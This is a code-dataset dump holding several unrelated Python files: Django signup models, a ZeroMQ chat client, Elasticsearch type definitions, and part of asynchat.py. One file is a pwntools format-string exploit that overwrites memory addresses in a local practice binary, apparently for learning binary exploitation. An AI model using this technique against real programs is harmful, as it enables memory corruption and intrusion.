hexsha
stringlengths
40
40
size
int64
2
1.02M
ext
stringclasses
10 values
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
4
245
max_stars_repo_name
stringlengths
6
130
max_stars_repo_head_hexsha
stringlengths
40
40
max_stars_repo_licenses
listlengths
1
10
max_stars_count
int64
1
191k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
4
245
max_issues_repo_name
stringlengths
6
130
max_issues_repo_head_hexsha
stringlengths
40
40
max_issues_repo_licenses
listlengths
1
10
max_issues_count
int64
1
67k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
4
245
max_forks_repo_name
stringlengths
6
130
max_forks_repo_head_hexsha
stringlengths
40
40
max_forks_repo_licenses
listlengths
1
10
max_forks_count
int64
1
105k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
content
stringlengths
2
1.02M
avg_line_length
float64
1
958k
max_line_length
int64
1
987k
alphanum_fraction
float64
0
1
content_no_comment
stringlengths
0
1.01M
is_comment_constant_removed
bool
2 classes
is_sharp_comment_removed
bool
1 class
f728cdb7e80b75fd8696d0d52ab7737e920cf1b9
1,341
py
Python
Examples/write/exploit.py
aliceloveMike/Tools-and-Examples-of-PWN
49b8965d315ccf67c4c3289917054aa8be7c4cd7
[ "MIT" ]
null
null
null
Examples/write/exploit.py
aliceloveMike/Tools-and-Examples-of-PWN
49b8965d315ccf67c4c3289917054aa8be7c4cd7
[ "MIT" ]
null
null
null
Examples/write/exploit.py
aliceloveMike/Tools-and-Examples-of-PWN
49b8965d315ccf67c4c3289917054aa8be7c4cd7
[ "MIT" ]
null
null
null
from pwn import * def forc(): sh = process('./overwrite') c_addr = int(sh.recvuntil('\n', drop=True), 16) print hex(c_addr) payload = p32(c_addr) + '%012d' + '%6$n' print payload #gdb.attach(sh) sh.sendline(payload) print sh.recv() sh.interactive() def fora(): sh = process('./overwrite') a_addr = 0x0804A024 payload = 'aa%8$naa' + p32(a_addr) sh.sendline(payload) print sh.recv() sh.interactive() def fmt(prev, word, index): if prev < word: result = word - prev fmtstr = "%" + str(result) + "c" elif prev == word: result = 0 else: result = 256 + word - prev fmtstr = "%" + str(result) + "c" fmtstr += "%" + str(index) + "$hhn" return fmtstr def fmt_str(offset, size, addr, target): payload = "" for i in range(4): if size == 4: payload += p32(addr + i) else: payload += p64(addr + i) prev = len(payload) for i in range(4): payload += fmt(prev, (target >> i * 8) & 0xff, offset + i) prev = (target >> i * 8) & 0xff return payload def forb(): sh = process('./overwrite') payload = fmt_str(6, 4, 0x0804A028, 0x12345678) print payload sh.sendline(payload) print sh.recv() sh.interactive() #forc() #fora() forb()
20.953125
66
0.537658
from pwn import * def forc(): sh = process('./overwrite') c_addr = int(sh.recvuntil('\n', drop=True), 16) print hex(c_addr) payload = p32(c_addr) + '%012d' + '%6$n' print payload sh.sendline(payload) print sh.recv() sh.interactive() def fora(): sh = process('./overwrite') a_addr = 0x0804A024 payload = 'aa%8$naa' + p32(a_addr) sh.sendline(payload) print sh.recv() sh.interactive() def fmt(prev, word, index): if prev < word: result = word - prev fmtstr = "%" + str(result) + "c" elif prev == word: result = 0 else: result = 256 + word - prev fmtstr = "%" + str(result) + "c" fmtstr += "%" + str(index) + "$hhn" return fmtstr def fmt_str(offset, size, addr, target): payload = "" for i in range(4): if size == 4: payload += p32(addr + i) else: payload += p64(addr + i) prev = len(payload) for i in range(4): payload += fmt(prev, (target >> i * 8) & 0xff, offset + i) prev = (target >> i * 8) & 0xff return payload def forb(): sh = process('./overwrite') payload = fmt_str(6, 4, 0x0804A028, 0x12345678) print payload sh.sendline(payload) print sh.recv() sh.interactive() forb()
false
true
f728cff82a71bcf8462465adc1eb5c0e3f090535
493
py
Python
dev/logger.py
BenSDuggan/DAPT
7f3f066e72aa51752220d598ba7cd7486835c485
[ "BSD-3-Clause" ]
1
2021-03-21T05:51:42.000Z
2021-03-21T05:51:42.000Z
dev/logger.py
BenSDuggan/DAPT
7f3f066e72aa51752220d598ba7cd7486835c485
[ "BSD-3-Clause" ]
null
null
null
dev/logger.py
BenSDuggan/DAPT
7f3f066e72aa51752220d598ba7cd7486835c485
[ "BSD-3-Clause" ]
null
null
null
# Test logging stuff import dapt, logging logger = logging.getLogger('sample logger') logger.setLevel(logging.DEBUG) # create console handler and set level to debug ch = logging.StreamHandler() ch.setLevel(logging.DEBUG) # add formatter to ch ch.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')) # add ch to logger logger.addHandler(ch) logger.warning('sup') db = dapt.tools.sample_db() param = dapt.Param(db) params = param.next_parameters()
17.607143
90
0.732252
import dapt, logging logger = logging.getLogger('sample logger') logger.setLevel(logging.DEBUG) ch = logging.StreamHandler() ch.setLevel(logging.DEBUG) ch.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')) logger.addHandler(ch) logger.warning('sup') db = dapt.tools.sample_db() param = dapt.Param(db) params = param.next_parameters()
true
true
f728d1273e634e458a98a003a6719a0316202510
3,444
py
Python
events/animecon2016/models.py
darkismus/kompassi
35dea2c7af2857a69cae5c5982b48f01ba56da1f
[ "CC-BY-3.0" ]
13
2015-11-29T12:19:12.000Z
2021-02-21T15:42:11.000Z
events/animecon2016/models.py
darkismus/kompassi
35dea2c7af2857a69cae5c5982b48f01ba56da1f
[ "CC-BY-3.0" ]
23
2015-04-29T19:43:34.000Z
2021-02-10T05:50:17.000Z
events/animecon2016/models.py
darkismus/kompassi
35dea2c7af2857a69cae5c5982b48f01ba56da1f
[ "CC-BY-3.0" ]
11
2015-09-20T18:59:00.000Z
2020-02-07T08:47:34.000Z
from django.db import models from core.utils import validate_slug from labour.models import ObsoleteSignupExtraBaseV1 TOTAL_WORK_CHOICES = [ ('minimi', 'Haluan tehdä vain minimityöpanoksen (JV: 10h, muut: 8h)'), ('ekstra', 'Olen valmis tekemään lisätunteja'), ] KORTITON_JV_HETU_LABEL = 'Henkilötunnus' KORTITON_JV_HETU_HELP_TEXT = 'HUOM! Täytä tämä kenttä vain, jos haet <strong>kortittomaksi järjestyksenvalvojaksi</strong>.' class SimpleChoice(models.Model): name = models.CharField(max_length=63) def __str__(self): return self.name class Meta: abstract = True class SpecialDiet(SimpleChoice): pass class Night(SimpleChoice): pass class SignupExtra(ObsoleteSignupExtraBaseV1): total_work = models.CharField(max_length=15, verbose_name='Toivottu kokonaistyömäärä', help_text='Kuinka paljon haluat tehdä töitä yhteensä tapahtuman aikana?', choices=TOTAL_WORK_CHOICES, ) personal_identification_number = models.CharField( max_length=12, verbose_name=KORTITON_JV_HETU_LABEL, help_text=KORTITON_JV_HETU_HELP_TEXT, default='', blank=True, ) want_certificate = models.BooleanField( default=False, verbose_name='Haluan todistuksen työskentelystäni Animeconissa', ) certificate_delivery_address = models.TextField( blank=True, verbose_name='Työtodistuksen toimitusosoite', help_text='Jos haluat työtodistuksen, täytä tähän kenttään postiosoite (katuosoite, ' 'postinumero ja postitoimipaikka) johon haluat todistuksen toimitettavan.', ) special_diet = models.ManyToManyField( SpecialDiet, blank=True, verbose_name='Erikoisruokavalio' ) special_diet_other = models.TextField( blank=True, verbose_name='Muu erikoisruokavalio', help_text='Jos noudatat erikoisruokavaliota, jota ei ole yllä olevassa listassa, ' 'ilmoita se tässä. Tapahtuman järjestäjä pyrkii ottamaan erikoisruokavaliot ' 'huomioon, mutta kaikkia erikoisruokavalioita ei välttämättä pystytä järjestämään.' ) lodging_needs = models.ManyToManyField(Night, blank=True, verbose_name='Tarvitsen lattiamajoitusta', help_text='Ruksaa ne yöt, joille tarvitset lattiamajoitusta. Lattiamajoitus sijaitsee ' 'kävelymatkan päässä tapahtumapaikalta.', ) prior_experience = models.TextField( blank=True, verbose_name='Työkokemus', help_text='Kerro tässä kentässä, jos sinulla on aiempaa kokemusta vastaavista ' 'tehtävistä tai muuta sellaista työkokemusta, josta arvioit olevan hyötyä ' 'hakemassasi tehtävässä.' ) free_text = models.TextField( blank=True, verbose_name='Vapaa alue', help_text='Jos haluat sanoa hakemuksesi käsittelijöille jotain sellaista, jolle ei ole ' 'omaa kenttää yllä, käytä tätä kenttää.' ) @classmethod def get_form_class(cls): from .forms import SignupExtraForm return SignupExtraForm @property def formatted_lodging_needs(self): return "\n".join("{night}: {need}".format( night=night.name, need='Tarvitsee lattiamajoitusta' if self.lodging_needs.filter(pk=night.pk).exists() else 'Ei tarvetta lattiamajoitukselle', ) for night in Night.objects.all())
31.888889
136
0.695412
from django.db import models from core.utils import validate_slug from labour.models import ObsoleteSignupExtraBaseV1 TOTAL_WORK_CHOICES = [ ('minimi', 'Haluan tehdä vain minimityöpanoksen (JV: 10h, muut: 8h)'), ('ekstra', 'Olen valmis tekemään lisätunteja'), ] KORTITON_JV_HETU_LABEL = 'Henkilötunnus' KORTITON_JV_HETU_HELP_TEXT = 'HUOM! Täytä tämä kenttä vain, jos haet <strong>kortittomaksi järjestyksenvalvojaksi</strong>.' class SimpleChoice(models.Model): name = models.CharField(max_length=63) def __str__(self): return self.name class Meta: abstract = True class SpecialDiet(SimpleChoice): pass class Night(SimpleChoice): pass class SignupExtra(ObsoleteSignupExtraBaseV1): total_work = models.CharField(max_length=15, verbose_name='Toivottu kokonaistyömäärä', help_text='Kuinka paljon haluat tehdä töitä yhteensä tapahtuman aikana?', choices=TOTAL_WORK_CHOICES, ) personal_identification_number = models.CharField( max_length=12, verbose_name=KORTITON_JV_HETU_LABEL, help_text=KORTITON_JV_HETU_HELP_TEXT, default='', blank=True, ) want_certificate = models.BooleanField( default=False, verbose_name='Haluan todistuksen työskentelystäni Animeconissa', ) certificate_delivery_address = models.TextField( blank=True, verbose_name='Työtodistuksen toimitusosoite', help_text='Jos haluat työtodistuksen, täytä tähän kenttään postiosoite (katuosoite, ' 'postinumero ja postitoimipaikka) johon haluat todistuksen toimitettavan.', ) special_diet = models.ManyToManyField( SpecialDiet, blank=True, verbose_name='Erikoisruokavalio' ) special_diet_other = models.TextField( blank=True, verbose_name='Muu erikoisruokavalio', help_text='Jos noudatat erikoisruokavaliota, jota ei ole yllä olevassa listassa, ' 'ilmoita se tässä. Tapahtuman järjestäjä pyrkii ottamaan erikoisruokavaliot ' 'huomioon, mutta kaikkia erikoisruokavalioita ei välttämättä pystytä järjestämään.' ) lodging_needs = models.ManyToManyField(Night, blank=True, verbose_name='Tarvitsen lattiamajoitusta', help_text='Ruksaa ne yöt, joille tarvitset lattiamajoitusta. Lattiamajoitus sijaitsee ' 'kävelymatkan päässä tapahtumapaikalta.', ) prior_experience = models.TextField( blank=True, verbose_name='Työkokemus', help_text='Kerro tässä kentässä, jos sinulla on aiempaa kokemusta vastaavista ' 'tehtävistä tai muuta sellaista työkokemusta, josta arvioit olevan hyötyä ' 'hakemassasi tehtävässä.' ) free_text = models.TextField( blank=True, verbose_name='Vapaa alue', help_text='Jos haluat sanoa hakemuksesi käsittelijöille jotain sellaista, jolle ei ole ' 'omaa kenttää yllä, käytä tätä kenttää.' ) @classmethod def get_form_class(cls): from .forms import SignupExtraForm return SignupExtraForm @property def formatted_lodging_needs(self): return "\n".join("{night}: {need}".format( night=night.name, need='Tarvitsee lattiamajoitusta' if self.lodging_needs.filter(pk=night.pk).exists() else 'Ei tarvetta lattiamajoitukselle', ) for night in Night.objects.all())
true
true
f728d140f24c12ba2622aebd1b1ce26996d4e5c0
478
py
Python
configs/denseclip_plus/anno_free/denseclip_plus_r50x16_deeplabv2_r101-d8_512x512_2k_voc12aug_20.py
buoyancy99/DenseCLIP
eac7810ca17c93aaf59f2a6b6c86ccbb4cdfcc9b
[ "Apache-2.0" ]
11
2022-02-04T01:09:45.000Z
2022-03-08T05:49:16.000Z
configs/denseclip_plus/anno_free/denseclip_plus_r50x16_deeplabv2_r101-d8_512x512_2k_voc12aug_20.py
buoyancy99/DenseCLIP
eac7810ca17c93aaf59f2a6b6c86ccbb4cdfcc9b
[ "Apache-2.0" ]
null
null
null
configs/denseclip_plus/anno_free/denseclip_plus_r50x16_deeplabv2_r101-d8_512x512_2k_voc12aug_20.py
buoyancy99/DenseCLIP
eac7810ca17c93aaf59f2a6b6c86ccbb4cdfcc9b
[ "Apache-2.0" ]
1
2022-02-03T10:29:40.000Z
2022-02-03T10:29:40.000Z
_base_ = './denseclip_plus_r50_deeplabv2_r101-d8_512x512_2k_voc12aug_20.py' model = dict( decode_head=dict( clip_channels=3072, channels=768, text_channels=768, text_embeddings_path='pretrain/voc_RN50x16_clip_text.pth', clip_weights_path='pretrain/RN50x16_clip_weights.pth', clip_cfg=dict( type='ResNetClip', stem_channels=96, base_channels=96, depth='50x16' ), ) )
28.117647
75
0.627615
_base_ = './denseclip_plus_r50_deeplabv2_r101-d8_512x512_2k_voc12aug_20.py' model = dict( decode_head=dict( clip_channels=3072, channels=768, text_channels=768, text_embeddings_path='pretrain/voc_RN50x16_clip_text.pth', clip_weights_path='pretrain/RN50x16_clip_weights.pth', clip_cfg=dict( type='ResNetClip', stem_channels=96, base_channels=96, depth='50x16' ), ) )
true
true
f728d153eaba3bceb0411414e7065dcc10802f7d
3,103
py
Python
Other/client_classes.py
botexpert/Chatter
8cd3262e38c58eae0fcbc49b3973f883a3185a48
[ "MIT" ]
null
null
null
Other/client_classes.py
botexpert/Chatter
8cd3262e38c58eae0fcbc49b3973f883a3185a48
[ "MIT" ]
null
null
null
Other/client_classes.py
botexpert/Chatter
8cd3262e38c58eae0fcbc49b3973f883a3185a48
[ "MIT" ]
2
2019-07-18T08:35:23.000Z
2019-07-18T09:24:00.000Z
import zmq from threading import Thread import time import json class StandaloneClient: def __init__(self, interface, host, user, target): self.interface = interface self.host = host self.connect_port = target.message_port self.bind_port = user.message_port self.heart_port = user.heart_port self.echo_port = target.heart_port self.context = zmq.Context.instance() self.ID = user.name self.target_ID = target.name def run(self): heart_thread = Thread(target=self.heart, name='heart_thread') heart_thread.daemon = True heart_thread.start() echo_thread = Thread(target=self.echo, name='echo_thread') echo_thread.daemon = True echo_thread.start() listen_thread = Thread(target=self.listener, name='listener_thread') listen_thread.daemon = True listen_thread.start() self.sender() # This part opens up the sockets for receiving messages and loops the # new message check, that will be improved later. def listener(self): listen_socket = self.context.socket(zmq.DEALER) listen_socket.setsockopt(zmq.IDENTITY, self.ID) listen_socket.connect( "tcp://{}:{}".format(self.host, self.connect_port)) while True: if listen_socket.poll(): message = listen_socket.recv_json() print(message) # This part starts a separate thread that activates the receiving part of # the client, enabling messages to come while the user is inputting a new # message. def sender(self): sender_socket = self.context.socket(zmq.ROUTER) sender_socket.bind( "tcp://{}:{}".format(self.interface, self.bind_port)) while True: send_text = json.dumps(input()).encode() send_message = [self.target_ID, send_text] sender_socket.send_multipart(send_message) # Waits for ping from other client and responds if alive. def heart(self): heart_socket = self.context.socket(zmq.REP) heart_socket.bind( "tcp://{}:{}".format(self.interface, self.heart_port)) while True: time.sleep(1) heart_socket.recv() heart_socket.send(b"pong") # Pings at intervals at the other client and detects if there is a # response within the time limit. Ping interval should be changed. def echo(self): echo_socket = self.context.socket(zmq.REQ) echo_socket.connect("tcp://{}:{}".format(self.host, self.echo_port)) echo_socket.setsockopt(zmq.REQ_RELAXED, 1) while True: echo_socket.send(b"ping") if not echo_socket.poll(2500): print('The other client is offline.') print('They might not receive sent messages.') # Class consisting of basic user information. class User: def __init__(self, name, message_port, heart_port): self.name = name.encode() self.message_port = message_port self.heart_port = heart_port
36.505882
77
0.63777
import zmq from threading import Thread import time import json class StandaloneClient: def __init__(self, interface, host, user, target): self.interface = interface self.host = host self.connect_port = target.message_port self.bind_port = user.message_port self.heart_port = user.heart_port self.echo_port = target.heart_port self.context = zmq.Context.instance() self.ID = user.name self.target_ID = target.name def run(self): heart_thread = Thread(target=self.heart, name='heart_thread') heart_thread.daemon = True heart_thread.start() echo_thread = Thread(target=self.echo, name='echo_thread') echo_thread.daemon = True echo_thread.start() listen_thread = Thread(target=self.listener, name='listener_thread') listen_thread.daemon = True listen_thread.start() self.sender() def listener(self): listen_socket = self.context.socket(zmq.DEALER) listen_socket.setsockopt(zmq.IDENTITY, self.ID) listen_socket.connect( "tcp://{}:{}".format(self.host, self.connect_port)) while True: if listen_socket.poll(): message = listen_socket.recv_json() print(message) def sender(self): sender_socket = self.context.socket(zmq.ROUTER) sender_socket.bind( "tcp://{}:{}".format(self.interface, self.bind_port)) while True: send_text = json.dumps(input()).encode() send_message = [self.target_ID, send_text] sender_socket.send_multipart(send_message) def heart(self): heart_socket = self.context.socket(zmq.REP) heart_socket.bind( "tcp://{}:{}".format(self.interface, self.heart_port)) while True: time.sleep(1) heart_socket.recv() heart_socket.send(b"pong") def echo(self): echo_socket = self.context.socket(zmq.REQ) echo_socket.connect("tcp://{}:{}".format(self.host, self.echo_port)) echo_socket.setsockopt(zmq.REQ_RELAXED, 1) while True: echo_socket.send(b"ping") if not echo_socket.poll(2500): print('The other client is offline.') print('They might not receive sent messages.') class User: def __init__(self, name, message_port, heart_port): self.name = name.encode() self.message_port = message_port self.heart_port = heart_port
true
true
f728d1953d721dca8d38921c3ee6a5ba731b6ad2
5,511
py
Python
pandagg/types.py
alkemics/panda
39e50d9b2408480ebf70c1a2d1a9fa12c55907c5
[ "Apache-2.0" ]
13
2020-03-03T20:59:08.000Z
2022-02-16T09:51:40.000Z
pandagg/types.py
alkemics/panda
39e50d9b2408480ebf70c1a2d1a9fa12c55907c5
[ "Apache-2.0" ]
57
2020-06-21T18:48:20.000Z
2022-03-16T09:52:39.000Z
pandagg/types.py
alkemics/panda
39e50d9b2408480ebf70c1a2d1a9fa12c55907c5
[ "Apache-2.0" ]
2
2020-03-03T20:59:20.000Z
2020-05-10T20:31:53.000Z
from typing_extensions import TypedDict, Literal from typing import Optional, Dict, Any, List, Union ClauseName = str ClauseType = str ClauseBody = Dict[str, Any] Meta = Dict[str, Any] # Script class Script(TypedDict, total=False): lang: str id: str source: str params: Dict[str, Any] GapPolicy = Literal["skip", "insert_zeros", "keep_values"] # Query QueryType = ClauseType QueryName = ClauseName QueryClauseDict = Dict[QueryType, ClauseBody] # Aggs AggName = ClauseName AggType = ClauseType AggClauseDict = Dict[AggType, ClauseBody] NamedAggsDict = Dict[AggName, AggClauseDict] BucketKeyAtom = Union[None, str, float] CompositeBucketKey = Dict[AggName, BucketKeyAtom] BucketKey = Union[BucketKeyAtom, CompositeBucketKey] BucketDict = Dict[str, Any] RangeDict = TypedDict( "RangeDict", {"from": float, "to": float, "key": str, "mask": str}, total=False ) DistanceType = Literal["arc", "plane"] ValidationMethod = Literal["STRICT", "COERCE", "IGNORE_MALFORMED"] ExecutionHint = Literal["map", "global_ordinals", "bytes_hash"] # https://www.elastic.co/guide/en/elasticsearch/reference/current/search-aggregations-bucket-composite-aggregation.html#_value_sources CompositeSource = AggClauseDict # https://www.elastic.co/guide/en/elasticsearch/reference/current/search-aggregations-bucket-composite-aggregation.html#_pagination AfterKey = Dict[str, Any] DocSource = Dict[str, Any] SettingsDict = Dict[str, Any] AliasName = str class AliasValue(TypedDict, total=False): filter: QueryClauseDict index_routing: str is_hidden: bool is_write_index: bool rooting: str search_routing: str IndexAliases = Dict[AliasName, AliasValue] IndexName = str # Mappings FieldName = ClauseName FieldType = ClauseType FieldClauseDict = Dict[str, Any] FieldPropertiesDict = Dict[FieldName, FieldClauseDict] class MappingsDict(TypedDict, total=False): properties: FieldPropertiesDict dynamic: bool class SourceIncludeDict(TypedDict, total=False): includes: Union[str, List[str]] excludes: Union[str, List[str]] class RunTimeMappingDict(TypedDict, total=False): type: str script: str class PointInTimeDict(TypedDict, total=False): id: str keep_alive: str class FieldDict(TypedDict, total=False): field: str format: str SearchDict = TypedDict( "SearchDict", { "aggs": NamedAggsDict, "aggregations": NamedAggsDict, "docvalue_fields": List[Union[str, FieldDict]], "fields": List[Union[str, FieldDict]], "explain": bool, "from": int, "highlight": Dict[str, Any], "indices_boost": List[Dict[IndexName, float]], "min_score": float, "pit": PointInTimeDict, "query": QueryClauseDict, "post_filter": QueryClauseDict, "runtime_mappings": Dict[FieldName, RunTimeMappingDict], "seq_no_primary_term": bool, "script_fields": Dict[str, Any], "size": int, "suggest": Dict[str, Any], "_source": Union[bool, str, List[str], SourceIncludeDict], "sort": List[Union[str, Dict[str, Any]]], "stats": List[str], "terminate_after": int, "timeout": Any, "version": bool, }, total=False, ) BucketsDict = Dict[BucketKeyAtom, BucketDict] Buckets = Union[BucketsDict, List[BucketDict]] class BucketsWrapperDict(TypedDict, total=False): buckets: Buckets doc_count_error_upper_bound: int sum_other_doc_count: int AggClauseResponseDict = Union[BucketsWrapperDict, BucketDict] AggregationsResponseDict = Dict[AggName, AggClauseResponseDict] class HitDict(TypedDict, total=False): _index: str _id: str _source: DocSource _score: float fields: Dict[str, List[Any]] highlight: Dict[str, List[str]] Relation = Literal["eq", "gte"] class TotalDict(TypedDict, total=False): value: int relation: Relation class HitsDict(TypedDict, total=False): total: TotalDict hits: List[HitDict] max_score: Optional[float] class ShardsDict(TypedDict, total=False): total: int successful: int skipped: int failed: int class ProfileShardDict(TypedDict, total=False): id: str searches: List aggregations: List class ProfileDict(TypedDict, total=False): shards: List[ProfileShardDict] class SuggestedItemDict(TypedDict, total=False): text: str offset: int length: int options: List[Dict[str, Any]] class SearchResponseDict(TypedDict, total=False): _scroll_id: str _shards: ShardsDict timed_out: bool terminated_early: bool took: int hits: HitsDict aggregations: AggregationsResponseDict profile: ProfileDict suggest: Dict[str, List[SuggestedItemDict]] class RetriesDict(TypedDict, total=False): bulk: int search: int class DeleteByQueryResponse(TypedDict, total=False): took: int timed_out: bool total: int deleted: int batches: int version_conflicts: int noops: int retries: RetriesDict throttled_millis: int requests_per_second: float throttled_until_millis: int failures: List[Dict[str, Any]] OpType = Literal["create", "index", "update", "delete"] class Action(TypedDict, total=False): _op_type: OpType _id: str _index: IndexName retry_on_conflict: int routing: str version: int version_type: Literal["external", "external_gte"] _source: DocSource doc: DocSource require_alias: bool dynamic_templates: Dict
23.253165
134
0.700417
from typing_extensions import TypedDict, Literal from typing import Optional, Dict, Any, List, Union ClauseName = str ClauseType = str ClauseBody = Dict[str, Any] Meta = Dict[str, Any] class Script(TypedDict, total=False): lang: str id: str source: str params: Dict[str, Any] GapPolicy = Literal["skip", "insert_zeros", "keep_values"] QueryType = ClauseType QueryName = ClauseName QueryClauseDict = Dict[QueryType, ClauseBody] AggName = ClauseName AggType = ClauseType AggClauseDict = Dict[AggType, ClauseBody] NamedAggsDict = Dict[AggName, AggClauseDict] BucketKeyAtom = Union[None, str, float] CompositeBucketKey = Dict[AggName, BucketKeyAtom] BucketKey = Union[BucketKeyAtom, CompositeBucketKey] BucketDict = Dict[str, Any] RangeDict = TypedDict( "RangeDict", {"from": float, "to": float, "key": str, "mask": str}, total=False ) DistanceType = Literal["arc", "plane"] ValidationMethod = Literal["STRICT", "COERCE", "IGNORE_MALFORMED"] ExecutionHint = Literal["map", "global_ordinals", "bytes_hash"] e = AggClauseDict Dict[str, Any] DocSource = Dict[str, Any] SettingsDict = Dict[str, Any] AliasName = str class AliasValue(TypedDict, total=False): filter: QueryClauseDict index_routing: str is_hidden: bool is_write_index: bool rooting: str search_routing: str IndexAliases = Dict[AliasName, AliasValue] IndexName = str FieldName = ClauseName FieldType = ClauseType FieldClauseDict = Dict[str, Any] FieldPropertiesDict = Dict[FieldName, FieldClauseDict] class MappingsDict(TypedDict, total=False): properties: FieldPropertiesDict dynamic: bool class SourceIncludeDict(TypedDict, total=False): includes: Union[str, List[str]] excludes: Union[str, List[str]] class RunTimeMappingDict(TypedDict, total=False): type: str script: str class PointInTimeDict(TypedDict, total=False): id: str keep_alive: str class FieldDict(TypedDict, total=False): field: str format: str SearchDict = TypedDict( "SearchDict", { "aggs": NamedAggsDict, "aggregations": NamedAggsDict, "docvalue_fields": List[Union[str, FieldDict]], "fields": List[Union[str, FieldDict]], "explain": bool, "from": int, "highlight": Dict[str, Any], "indices_boost": List[Dict[IndexName, float]], "min_score": float, "pit": PointInTimeDict, "query": QueryClauseDict, "post_filter": QueryClauseDict, "runtime_mappings": Dict[FieldName, RunTimeMappingDict], "seq_no_primary_term": bool, "script_fields": Dict[str, Any], "size": int, "suggest": Dict[str, Any], "_source": Union[bool, str, List[str], SourceIncludeDict], "sort": List[Union[str, Dict[str, Any]]], "stats": List[str], "terminate_after": int, "timeout": Any, "version": bool, }, total=False, ) BucketsDict = Dict[BucketKeyAtom, BucketDict] Buckets = Union[BucketsDict, List[BucketDict]] class BucketsWrapperDict(TypedDict, total=False): buckets: Buckets doc_count_error_upper_bound: int sum_other_doc_count: int AggClauseResponseDict = Union[BucketsWrapperDict, BucketDict] AggregationsResponseDict = Dict[AggName, AggClauseResponseDict] class HitDict(TypedDict, total=False): _index: str _id: str _source: DocSource _score: float fields: Dict[str, List[Any]] highlight: Dict[str, List[str]] Relation = Literal["eq", "gte"] class TotalDict(TypedDict, total=False): value: int relation: Relation class HitsDict(TypedDict, total=False): total: TotalDict hits: List[HitDict] max_score: Optional[float] class ShardsDict(TypedDict, total=False): total: int successful: int skipped: int failed: int class ProfileShardDict(TypedDict, total=False): id: str searches: List aggregations: List class ProfileDict(TypedDict, total=False): shards: List[ProfileShardDict] class SuggestedItemDict(TypedDict, total=False): text: str offset: int length: int options: List[Dict[str, Any]] class SearchResponseDict(TypedDict, total=False): _scroll_id: str _shards: ShardsDict timed_out: bool terminated_early: bool took: int hits: HitsDict aggregations: AggregationsResponseDict profile: ProfileDict suggest: Dict[str, List[SuggestedItemDict]] class RetriesDict(TypedDict, total=False): bulk: int search: int class DeleteByQueryResponse(TypedDict, total=False): took: int timed_out: bool total: int deleted: int batches: int version_conflicts: int noops: int retries: RetriesDict throttled_millis: int requests_per_second: float throttled_until_millis: int failures: List[Dict[str, Any]] OpType = Literal["create", "index", "update", "delete"] class Action(TypedDict, total=False): _op_type: OpType _id: str _index: IndexName retry_on_conflict: int routing: str version: int version_type: Literal["external", "external_gte"] _source: DocSource doc: DocSource require_alias: bool dynamic_templates: Dict
true
true
f728d1b47053ea894f30592b58ae6215583dad16
11,971
py
Python
Lib/asynchat.py
Hadron/python
73137f499ed658169f49273eee46845e3b53e800
[ "PSF-2.0" ]
332
2015-08-22T12:43:56.000Z
2022-03-17T01:05:43.000Z
Lib/asynchat.py
Hadron/python
73137f499ed658169f49273eee46845e3b53e800
[ "PSF-2.0" ]
36
2015-05-30T08:39:19.000Z
2022-03-04T20:42:33.000Z
Lib/asynchat.py
Hadron/python
73137f499ed658169f49273eee46845e3b53e800
[ "PSF-2.0" ]
74
2015-05-29T17:18:53.000Z
2022-01-15T14:06:44.000Z
# -*- Mode: Python; tab-width: 4 -*- # Id: asynchat.py,v 2.26 2000/09/07 22:29:26 rushing Exp # Author: Sam Rushing <rushing@nightmare.com> # ====================================================================== # Copyright 1996 by Sam Rushing # # All Rights Reserved # # Permission to use, copy, modify, and distribute this software and # its documentation for any purpose and without fee is hereby # granted, provided that the above copyright notice appear in all # copies and that both that copyright notice and this permission # notice appear in supporting documentation, and that the name of Sam # Rushing not be used in advertising or publicity pertaining to # distribution of the software without specific, written prior # permission. # # SAM RUSHING DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, # INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN # NO EVENT SHALL SAM RUSHING BE LIABLE FOR ANY SPECIAL, INDIRECT OR # CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS # OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, # NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN # CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. # ====================================================================== r"""A class supporting chat-style (command/response) protocols. This class adds support for 'chat' style protocols - where one side sends a 'command', and the other sends a response (examples would be the common internet protocols - smtp, nntp, ftp, etc..). The handle_read() method looks at the input stream for the current 'terminator' (usually '\r\n' for single-line responses, '\r\n.\r\n' for multi-line output), calling self.found_terminator() on its receipt. for example: Say you build an async nntp client using this class. At the start of the connection, you'll have self.terminator set to '\r\n', in order to process the single-line greeting. Just before issuing a 'LIST' command you'll set it to '\r\n.\r\n'. The output of the LIST command will be accumulated (using your own 'collect_incoming_data' method) up to the terminator, and then control will be returned to you - by calling your self.found_terminator() method. """ import asyncore from collections import deque class async_chat(asyncore.dispatcher): """This is an abstract class. You must derive from this class, and add the two methods collect_incoming_data() and found_terminator()""" # these are overridable defaults ac_in_buffer_size = 65536 ac_out_buffer_size = 65536 # we don't want to enable the use of encoding by default, because that is a # sign of an application bug that we don't want to pass silently use_encoding = 0 encoding = 'latin-1' def __init__(self, sock=None, map=None): # for string terminator matching self.ac_in_buffer = b'' # we use a list here rather than io.BytesIO for a few reasons... # del lst[:] is faster than bio.truncate(0) # lst = [] is faster than bio.truncate(0) self.incoming = [] # we toss the use of the "simple producer" and replace it with # a pure deque, which the original fifo was a wrapping of self.producer_fifo = deque() asyncore.dispatcher.__init__(self, sock, map) def collect_incoming_data(self, data): raise NotImplementedError("must be implemented in subclass") def _collect_incoming_data(self, data): self.incoming.append(data) def _get_data(self): d = b''.join(self.incoming) del self.incoming[:] return d def found_terminator(self): raise NotImplementedError("must be implemented in subclass") def set_terminator(self, term): """Set the input delimiter. Can be a fixed string of any length, an integer, or None. """ if isinstance(term, str) and self.use_encoding: term = bytes(term, self.encoding) elif isinstance(term, int) and term < 0: raise ValueError('the number of received bytes must be positive') self.terminator = term def get_terminator(self): return 